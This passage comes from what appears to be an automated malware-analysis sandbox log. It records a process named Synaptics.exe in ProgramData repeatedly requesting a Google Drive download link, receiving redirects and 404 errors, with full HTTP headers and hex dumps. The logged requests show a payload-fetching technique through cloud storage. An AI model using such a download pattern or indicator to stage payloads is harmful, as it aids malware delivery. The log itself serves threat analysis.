                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:43 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5gstVG9ouQspWNOvWXlWMKIOc_4q-zauMGlryv7fSQO1QkjRcCjsIiBB08XSid9f5p
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:43 GMT
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TOnM3njbDoZvr9dpqpqA4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:43 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:43 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 37 6e 42 37 30 35 69 69 59 45 50 37 6a 64 4a 53 72 6d 42 70 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="E7nB705iiYEP7jdJSrmBpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:43 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            21192.168.2.949857216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:42 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:43 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6FmOF4nQB1QFLxUKowGzw4M578Y53Gpgwcr-5qXO50kj3yg2E8KDIu2MBUV4GIPlfRnw708PY
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:43 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-B1C1s3xvcKgqplh3l5kGEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:43 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:43 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 75 69 6d 74 78 64 2d 5a 67 47 4c 69 7a 43 59 68 52 47 4e 47 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="Ouimtxd-ZgGLizCYhRGNGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:43 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            22192.168.2.949869216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:43 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:44 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6yuRk96Asy0M-_vUlLbrGGPx_bf5wMgLT1317HoWvzNYudNOpzdPLyowWj1bMZzobc
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:44 GMT
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-fJQwG76P72Cf8HTF18hkRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:44 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:44 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 5f 63 55 36 54 66 5f 5a 66 31 6f 43 75 71 58 73 6d 63 71 30 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="1_cU6Tf_Zf1oCuqXsmcq0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:44 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            23192.168.2.949865172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:43 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:44 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:44 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-pwMXQ9svkLW6zs1UEglMGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            24192.168.2.949872216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:43 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:44 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC58GSHqt-Htrb-a5D6tAo-fhb8HmgGAS5EveCdfiDCsgm3oShiyBaRLe8zfKgixWfxK
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:44 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-vd6-Qw0tB3IIU80raDPXmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:44 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:29:44 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 50 70 46 46 67 4b 50 76 77 6d 5a 6f 6b 54 4e 59 76 32 55 35 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="9PpFFgKPvwmZokTNYv2U5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:29:44 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            25192.168.2.949868172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:43 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:44 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:44 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-QSLfjXgWWzUKVzOC3KJ2nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            26192.168.2.949890172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:45 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:45 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:45 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-qZCPrQU7TdHZ6b-Nm-vJPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            27192.168.2.949891172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:45 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:45 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
